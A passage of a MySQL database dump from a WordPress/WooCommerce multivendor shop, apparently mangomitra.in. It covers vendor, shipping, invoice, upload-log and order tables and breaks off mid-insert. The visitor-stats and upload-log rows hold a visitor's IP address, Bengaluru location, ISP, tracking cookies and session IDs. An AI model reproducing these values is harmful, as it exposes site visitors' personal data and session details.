-- Table structure for table `wp_wcmp_cust_questions`
--

DROP TABLE IF EXISTS `wp_wcmp_cust_questions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcmp_cust_questions` (
  `ques_ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `product_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ques_details` text NOT NULL,
  `ques_by` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ques_created` timestamp NOT NULL DEFAULT current_timestamp(),
  `ques_vote` longtext DEFAULT NULL,
  `status` text NOT NULL,
  PRIMARY KEY (`ques_ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcmp_cust_questions`
--

LOCK TABLES `wp_wcmp_cust_questions` WRITE;
/*!40000 ALTER TABLE `wp_wcmp_cust_questions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcmp_cust_questions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcmp_products_map`
--

DROP TABLE IF EXISTS `wp_wcmp_products_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcmp_products_map` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `product_map_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `product_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcmp_products_map`
--

LOCK TABLES `wp_wcmp_products_map` WRITE;
/*!40000 ALTER TABLE `wp_wcmp_products_map` DISABLE KEYS */;
INSERT INTO `wp_wcmp_products_map` VALUES (1,1,576,'2022-01-24 10:57:15'),(2,1,540,'2022-01-24 10:57:15'),(3,3,578,'2022-01-24 11:16:02'),(4,3,538,'2022-01-24 11:16:02');
/*!40000 ALTER TABLE `wp_wcmp_products_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcmp_shipping_zone_locations`
--

DROP TABLE IF EXISTS `wp_wcmp_shipping_zone_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcmp_shipping_zone_locations` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `vendor_id` int(11) DEFAULT NULL,
  `zone_id` int(11) DEFAULT NULL,
  `location_code` varchar(255) DEFAULT NULL,
  `location_type` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcmp_shipping_zone_locations`
--

LOCK TABLES `wp_wcmp_shipping_zone_locations` WRITE;
/*!40000 ALTER TABLE `wp_wcmp_shipping_zone_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcmp_shipping_zone_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcmp_shipping_zone_methods`
--

DROP TABLE IF EXISTS `wp_wcmp_shipping_zone_methods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcmp_shipping_zone_methods` (
  `instance_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `method_id` varchar(255) NOT NULL DEFAULT '',
  `zone_id` int(11) unsigned NOT NULL,
  `vendor_id` int(11) NOT NULL,
  `is_enabled` tinyint(1) NOT NULL DEFAULT 1,
  `settings` longtext DEFAULT NULL,
  PRIMARY KEY (`instance_id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcmp_shipping_zone_methods`
--

LOCK TABLES `wp_wcmp_shipping_zone_methods` WRITE;
/*!40000 ALTER TABLE `wp_wcmp_shipping_zone_methods` DISABLE KEYS */;
INSERT INTO `wp_wcmp_shipping_zone_methods` VALUES (1,'flat_rate',1,2,1,NULL),(2,'free_shipping',1,3,1,NULL),(3,'flat_rate',1,4,1,NULL);
/*!40000 ALTER TABLE `wp_wcmp_shipping_zone_methods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcmp_vendor_ledger`
--

DROP TABLE IF EXISTS `wp_wcmp_vendor_ledger`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcmp_vendor_ledger` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `vendor_id` int(11) NOT NULL,
  `order_id` bigint(20) NOT NULL,
  `ref_id` bigint(20) NOT NULL,
  `ref_type` varchar(100) NOT NULL DEFAULT '',
  `ref_info` varchar(255) NOT NULL DEFAULT '',
  `ref_status` varchar(100) NOT NULL DEFAULT '',
  `ref_updated` timestamp NULL DEFAULT NULL,
  `credit` varchar(100) NOT NULL,
  `debit` varchar(100) NOT NULL,
  `balance` varchar(255) NOT NULL DEFAULT '0',
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcmp_vendor_ledger`
--

LOCK TABLES `wp_wcmp_vendor_ledger` WRITE;
/*!40000 ALTER TABLE `wp_wcmp_vendor_ledger` DISABLE KEYS */;
INSERT INTO `wp_wcmp_vendor_ledger` VALUES (1,4,581,582,'commission','Commission generated for Order &ndash; <a href=\"https://www.mangomitra.in/?page_id=5&#038;vendor-orders=581\" target=\"_blank\">#581</a>','unpaid','2022-01-25 03:56:26','0','','0','2022-01-25 03:56:26');
/*!40000 ALTER TABLE `wp_wcmp_vendor_ledger` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcmp_vendor_orders`
--

DROP TABLE IF EXISTS `wp_wcmp_vendor_orders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcmp_vendor_orders` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `order_id` bigint(20) NOT NULL,
  `commission_id` bigint(20) NOT NULL,
  `commission_status` varchar(100) NOT NULL DEFAULT 'unpaid',
  `commission_paid_date` timestamp NULL DEFAULT NULL,
  `vendor_id` bigint(20) NOT NULL,
  `shipping_status` varchar(255) NOT NULL,
  `order_item_id` bigint(20) NOT NULL,
  `line_item_type` longtext DEFAULT NULL,
  `product_id` bigint(20) NOT NULL,
  `variation_id` bigint(20) NOT NULL DEFAULT 0,
  `quantity` bigint(20) NOT NULL DEFAULT 1,
  `commission_amount` varchar(255) NOT NULL,
  `shipping` varchar(255) NOT NULL,
  `tax` varchar(255) NOT NULL,
  `shipping_tax_amount` varchar(255) NOT NULL DEFAULT '0',
  `is_trashed` varchar(10) NOT NULL,
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`),
  UNIQUE KEY `vendor_orders` (`order_id`,`vendor_id`,`commission_id`,`order_item_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcmp_vendor_orders`
--

LOCK TABLES `wp_wcmp_vendor_orders` WRITE;
/*!40000 ALTER TABLE `wp_wcmp_vendor_orders` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcmp_vendor_orders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcmp_visitors_stats`
--

DROP TABLE IF EXISTS `wp_wcmp_visitors_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcmp_visitors_stats` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `vendor_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_cookie` varchar(255) NOT NULL,
  `session_id` varchar(191) NOT NULL,
  `ip` varchar(60) NOT NULL,
  `lat` varchar(60) NOT NULL,
  `lon` varchar(60) NOT NULL,
  `city` text NOT NULL,
  `zip` varchar(20) NOT NULL,
  `regionCode` text NOT NULL,
  `region` text NOT NULL,
  `countryCode` text NOT NULL,
  `country` text NOT NULL,
  `isp` text NOT NULL,
  `timezone` varchar(255) NOT NULL,
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`),
  UNIQUE KEY `visitor` (`vendor_id`,`session_id`),
  KEY `vendor_id` (`vendor_id`),
  KEY `user_id` (`user_id`),
  KEY `user_cookie` (`user_cookie`(191)),
  KEY `session_id` (`session_id`),
  KEY `ip` (`ip`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcmp_visitors_stats`
--

LOCK TABLES `wp_wcmp_visitors_stats` WRITE;
/*!40000 ALTER TABLE `wp_wcmp_visitors_stats` DISABLE KEYS */;
INSERT INTO `wp_wcmp_visitors_stats` VALUES (1,4,1,'wcmp_cookie61ee797a4398b','','171.76.108.252','12.9634','77.5855','Bengaluru','560002','KA','Karnataka','IN','India','Bharti Airtel Limited','Asia/Kolkata','2022-01-25 05:07:31'),(2,2,1,'wcmp_cookie61ee797a4398b','','171.76.108.252','12.9634','77.5855','Bengaluru','560002','KA','Karnataka','IN','India','Bharti Airtel Limited','Asia/Kolkata','2022-01-24 10:24:06'),(7,3,0,'wcmp_cookie61efe0a56c465','','171.76.108.252','12.9634','77.5855','Bengaluru','560002','KA','Karnataka','IN','India','Bharti Airtel Limited','Asia/Kolkata','2022-01-25 11:36:08');
/*!40000 ALTER TABLE `wp_wcmp_visitors_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcpdf_invoice_number`
--

DROP TABLE IF EXISTS `wp_wcpdf_invoice_number`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcpdf_invoice_number` (
  `id` int(16) NOT NULL AUTO_INCREMENT,
  `order_id` int(16) DEFAULT NULL,
  `date` datetime NOT NULL DEFAULT '1000-01-01 00:00:00',
  `calculated_number` int(16) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=15 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcpdf_invoice_number`
--

LOCK TABLES `wp_wcpdf_invoice_number` WRITE;
/*!40000 ALTER TABLE `wp_wcpdf_invoice_number` DISABLE KEYS */;
INSERT INTO `wp_wcpdf_invoice_number` VALUES (1,1022,'2022-03-03 10:56:46',NULL),(2,1023,'2022-03-03 11:02:52',NULL),(3,1197,'2022-03-07 12:48:35',NULL),(4,1198,'2022-03-07 12:50:56',NULL),(5,1199,'2022-03-07 12:53:19',NULL),(6,1200,'2022-03-07 13:05:02',NULL),(7,1201,'2022-03-07 15:04:53',NULL),(8,1277,'2022-03-15 13:17:55',NULL),(9,1278,'2022-03-15 13:20:57',NULL),(10,1279,'2022-03-15 13:28:20',NULL),(11,1280,'2022-03-15 13:32:39',NULL),(12,1988,'2022-10-27 17:54:18',NULL),(13,1989,'2022-10-28 09:39:27',NULL),(14,2032,'2022-11-22 12:25:11',NULL);
/*!40000 ALTER TABLE `wp_wcpdf_invoice_number` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wdp_order_items`
--

DROP TABLE IF EXISTS `wp_wdp_order_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wdp_order_items` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `order_id` int(11) NOT NULL,
  `product_id` int(11) NOT NULL,
  `rule_id` int(11) NOT NULL,
  `amount` decimal(50,2) DEFAULT 0.00,
  `qty` int(11) DEFAULT 0,
  `gifted_amount` decimal(50,2) DEFAULT 0.00,
  `gifted_qty` int(11) DEFAULT 0,
  `date` datetime DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `order_id` (`order_id`,`rule_id`,`product_id`),
  KEY `rule_id` (`rule_id`),
  KEY `product_id` (`product_id`),
  KEY `date` (`date`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wdp_order_items`
--

LOCK TABLES `wp_wdp_order_items` WRITE;
/*!40000 ALTER TABLE `wp_wdp_order_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wdp_order_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wdp_orders`
--

DROP TABLE IF EXISTS `wp_wdp_orders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wdp_orders` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `order_id` int(11) NOT NULL,
  `rule_id` int(11) NOT NULL,
  `amount` decimal(50,2) DEFAULT 0.00,
  `qty` int(11) DEFAULT 0,
  `extra` decimal(50,2) DEFAULT 0.00,
  `shipping` decimal(50,2) DEFAULT 0.00,
  `is_free_shipping` tinyint(1) DEFAULT 0,
  `gifted_amount` decimal(50,2) DEFAULT 0.00,
  `gifted_qty` int(11) DEFAULT 0,
  `date` datetime DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `order_id` (`order_id`,`rule_id`),
  KEY `rule_id` (`rule_id`),
  KEY `date` (`date`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wdp_orders`
--

LOCK TABLES `wp_wdp_orders` WRITE;
/*!40000 ALTER TABLE `wp_wdp_orders` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wdp_orders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wdp_persistent_rules_cache`
--

DROP TABLE IF EXISTS `wp_wdp_persistent_rules_cache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wdp_persistent_rules_cache` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `product` varchar(255) NOT NULL,
  `rule_id` int(11) NOT NULL,
  `qty_start` float NOT NULL DEFAULT 1,
  `qty_finish` float DEFAULT NULL,
  `original_price` float NOT NULL,
  `price` float NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wdp_persistent_rules_cache`
--

LOCK TABLES `wp_wdp_persistent_rules_cache` WRITE;
/*!40000 ALTER TABLE `wp_wdp_persistent_rules_cache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wdp_persistent_rules_cache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wdp_rules`
--

DROP TABLE IF EXISTS `wp_wdp_rules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wdp_rules` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `deleted` tinyint(1) DEFAULT 0,
  `enabled` tinyint(1) DEFAULT 1,
  `exclusive` tinyint(1) DEFAULT 0,
  `rule_type` varchar(50) DEFAULT NULL,
  `type` varchar(50) DEFAULT NULL,
  `title` varchar(255) DEFAULT NULL,
  `priority` int(11) DEFAULT NULL,
  `options` text DEFAULT NULL,
  `additional` text DEFAULT NULL,
  `advertising` text DEFAULT NULL,
  `conditions` text DEFAULT NULL,
  `filters` text DEFAULT NULL,
  `limits` text DEFAULT NULL,
  `product_adjustments` text DEFAULT NULL,
  `sortable_blocks_priority` text DEFAULT NULL,
  `bulk_adjustments` text DEFAULT NULL,
  `role_discounts` text DEFAULT NULL,
  `cart_adjustments` text DEFAULT NULL,
  `get_products` text DEFAULT NULL,
  `auto_add_products` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `deleted` (`deleted`),
  KEY `enabled` (`enabled`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wdp_rules`
--

LOCK TABLES `wp_wdp_rules` WRITE;
/*!40000 ALTER TABLE `wp_wdp_rules` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wdp_rules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfu_dbxqueue`
--

DROP TABLE IF EXISTS `wp_wfu_dbxqueue`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wfu_dbxqueue` (
  `iddbxqueue` mediumint(9) NOT NULL AUTO_INCREMENT,
  `fileid` mediumint(9) NOT NULL,
  `priority` mediumint(9) NOT NULL,
  `status` mediumint(9) NOT NULL,
  `jobid` varchar(10) NOT NULL,
  `start_time` bigint(20) DEFAULT NULL,
  PRIMARY KEY (`iddbxqueue`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfu_dbxqueue`
--

LOCK TABLES `wp_wfu_dbxqueue` WRITE;
/*!40000 ALTER TABLE `wp_wfu_dbxqueue` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfu_dbxqueue` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfu_log`
--

DROP TABLE IF EXISTS `wp_wfu_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wfu_log` (
  `idlog` mediumint(9) NOT NULL AUTO_INCREMENT,
  `userid` int(11) NOT NULL,
  `uploaduserid` int(11) NOT NULL,
  `uploadtime` bigint(20) DEFAULT NULL,
  `sessionid` varchar(40) DEFAULT NULL,
  `filepath` text NOT NULL,
  `filehash` varchar(100) NOT NULL,
  `filesize` bigint(20) NOT NULL,
  `uploadid` varchar(20) NOT NULL,
  `pageid` mediumint(9) DEFAULT NULL,
  `blogid` mediumint(9) DEFAULT NULL,
  `sid` varchar(10) DEFAULT NULL,
  `date_from` datetime DEFAULT NULL,
  `date_to` datetime DEFAULT NULL,
  `action` varchar(20) NOT NULL,
  `linkedto` mediumint(9) DEFAULT NULL,
  `filedata` text DEFAULT NULL,
  PRIMARY KEY (`idlog`),
  KEY `uploadid` (`uploadid`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfu_log`
--

LOCK TABLES `wp_wfu_log` WRITE;
/*!40000 ALTER TABLE `wp_wfu_log` DISABLE KEYS */;
INSERT INTO `wp_wfu_log` VALUES (1,1,1,1646893150,'8CH4kS9bn5hcpBb87NMbCnQGMkeRzz23','/wp-content/uploads/bulk_booking_form-3.xlsx','',9843,'RzfeNgCotG',1204,1,'1','2022-03-10 06:19:10','0000-00-00 00:00:00','upload',NULL,NULL),(2,26,26,1646893977,'8CH4kS9bn5hcpBb87NMbCnQGMkeRzz23','/wp-content/uploads/bulk_booking_form-1.xlsx','',9843,'yeE9v1xkBs',1204,1,'1','2022-03-10 06:32:57','0000-00-00 00:00:00','upload',NULL,NULL),(3,27,27,1647237381,'tDjH28xLShqqAqPwCSG7qrqzyHYXfdgG','/wp-content/uploads/bulk_booking_form-3-1.xlsx','',9544,'tpTiqVakms',1204,1,'1','2022-03-14 05:56:21','0000-00-00 00:00:00','upload',NULL,NULL),(4,29,29,1647331704,'p8Q6gdGbk6CMt7XynGa98Osj6Lccbr3a','/wp-content/uploads/bulk_booking_form-3-2.xlsx','',9630,'OlvraeNXAZ',1204,1,'1','2022-03-15 08:08:24','0000-00-00 00:00:00','upload',NULL,NULL);
/*!40000 ALTER TABLE `wp_wfu_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfu_userdata`
--

DROP TABLE IF EXISTS `wp_wfu_userdata`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wfu_userdata` (
  `iduserdata` mediumint(9) NOT NULL AUTO_INCREMENT,
  `uploadid` varchar(20) NOT NULL,
  `property` varchar(100) NOT NULL,
  `propkey` mediumint(9) NOT NULL,
  `propvalue` text DEFAULT NULL,
  `date_from` datetime DEFAULT NULL,
  `date_to` datetime DEFAULT NULL,
  PRIMARY KEY (`iduserdata`),
  KEY `uploadid` (`uploadid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfu_userdata`
--

LOCK TABLES `wp_wfu_userdata` WRITE;
/*!40000 ALTER TABLE `wp_wfu_userdata` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfu_userdata` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_api_keys`
--

DROP TABLE IF EXISTS `wp_woocommerce_api_keys`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_api_keys` (
  `key_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `description` varchar(200) DEFAULT NULL,
  `permissions` varchar(10) NOT NULL,
  `consumer_key` char(64) NOT NULL,
  `consumer_secret` char(43) NOT NULL,
  `nonces` longtext DEFAULT NULL,
  `truncated_key` char(7) NOT NULL,
  `last_access` datetime DEFAULT NULL,
  PRIMARY KEY (`key_id`),
  KEY `consumer_key` (`consumer_key`),
  KEY `consumer_secret` (`consumer_secret`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_api_keys`
--

LOCK TABLES `wp_woocommerce_api_keys` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_api_keys` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_api_keys` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_attribute_taxonomies`
--

DROP TABLE IF EXISTS `wp_woocommerce_attribute_taxonomies`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_attribute_taxonomies` (
  `attribute_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `attribute_name` varchar(200) NOT NULL,
  `attribute_label` varchar(200) DEFAULT NULL,
  `attribute_type` varchar(20) NOT NULL,
  `attribute_orderby` varchar(20) NOT NULL,
  `attribute_public` int(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`attribute_id`),
  KEY `attribute_name` (`attribute_name`(20))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_attribute_taxonomies`
--

LOCK TABLES `wp_woocommerce_attribute_taxonomies` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_attribute_taxonomies` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_attribute_taxonomies` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_downloadable_product_permissions`
--

DROP TABLE IF EXISTS `wp_woocommerce_downloadable_product_permissions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_downloadable_product_permissions` (
  `permission_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `download_id` varchar(36) NOT NULL,
  `product_id` bigint(20) unsigned NOT NULL,
  `order_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `order_key` varchar(200) NOT NULL,
  `user_email` varchar(200) NOT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `downloads_remaining` varchar(9) DEFAULT NULL,
  `access_granted` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access_expires` datetime DEFAULT NULL,
  `download_count` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`permission_id`),
  KEY `download_order_key_product` (`product_id`,`order_id`,`order_key`(16),`download_id`),
  KEY `download_order_product` (`download_id`,`order_id`,`product_id`),
  KEY `order_id` (`order_id`),
  KEY `user_order_remaining_expires` (`user_id`,`order_id`,`downloads_remaining`,`access_expires`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_downloadable_product_permissions`
--

LOCK TABLES `wp_woocommerce_downloadable_product_permissions` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_downloadable_product_permissions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_downloadable_product_permissions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_log`
--

DROP TABLE IF EXISTS `wp_woocommerce_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_log` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `level` smallint(4) NOT NULL,
  `source` varchar(200) NOT NULL,
  `message` longtext NOT NULL,
  `context` longtext DEFAULT NULL,
  PRIMARY KEY (`log_id`),
  KEY `level` (`level`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_log`
--

LOCK TABLES `wp_woocommerce_log` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_order_itemmeta`
--

DROP TABLE IF EXISTS `wp_woocommerce_order_itemmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_order_itemmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_item_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `order_item_id` (`order_item_id`),
  KEY `meta_key` (`meta_key`(32))
) ENGINE=InnoDB AUTO_INCREMENT=1255 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_order_itemmeta`
--

LOCK TABLES `wp_woocommerce_order_itemmeta` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_order_itemmeta` DISABLE KEYS */;
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (1,1,'_product_id','543'),(2,1,'_variation_id','0'),(3,1,'_qty','1'),(4,1,'_tax_class',''),(5,1,'_line_subtotal','220'),(6,1,'_line_subtotal_tax','0'),(7,1,'_line_total','220'),(8,1,'_line_tax','0'),(9,1,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(10,1,'Sold By','Gamma'),(11,1,'_vendor_id','4'),(12,2,'method_id','wcmp_vendor_shipping'),(13,2,'instance_id','1'),(14,2,'cost','0.00'),(15,2,'total_tax','0'),(16,2,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(17,2,'vendor_id','4'),(18,2,'package_qty','1'),(19,3,'_product_id','543'),(20,3,'_variation_id','0'),(21,3,'_qty','1'),(22,3,'_tax_class',''),(23,3,'_line_subtotal','220'),(24,3,'_line_subtotal_tax','0'),(25,3,'_line_total','220'),(26,3,'_line_tax','0'),(27,3,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(28,3,'_vendor_order_item_id','1'),(29,3,'_vendor_item_commission','0'),(30,3,'Sold 